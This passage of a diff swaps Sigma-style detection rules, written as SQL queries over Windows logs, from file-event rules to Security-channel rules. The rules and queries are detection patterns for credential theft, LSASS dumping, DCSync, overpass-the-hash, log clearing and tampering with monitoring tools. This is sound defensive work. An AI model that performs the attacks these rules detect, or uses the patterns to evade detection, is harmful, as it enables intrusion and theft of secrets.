ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Security Event Log Cleared", + "id": "a122ac13-daf8-4175-83a2-72c387be339d", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1070.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_event_log_cleared.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "status": "test", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "status": "test", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "PsExec Service File Creation", - "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_tool_psexec.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.s0002", + "attack.t1550.002" + ], + "falsepositives": [ + "Runas command-line tool using /netonly parameter" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + ], + "filename": "win_security_overpass_the_hash.yml" + }, + { + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Faulty legacy applications" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1003.004" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "title": "Suspicious Remote Logon with Explicit Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE 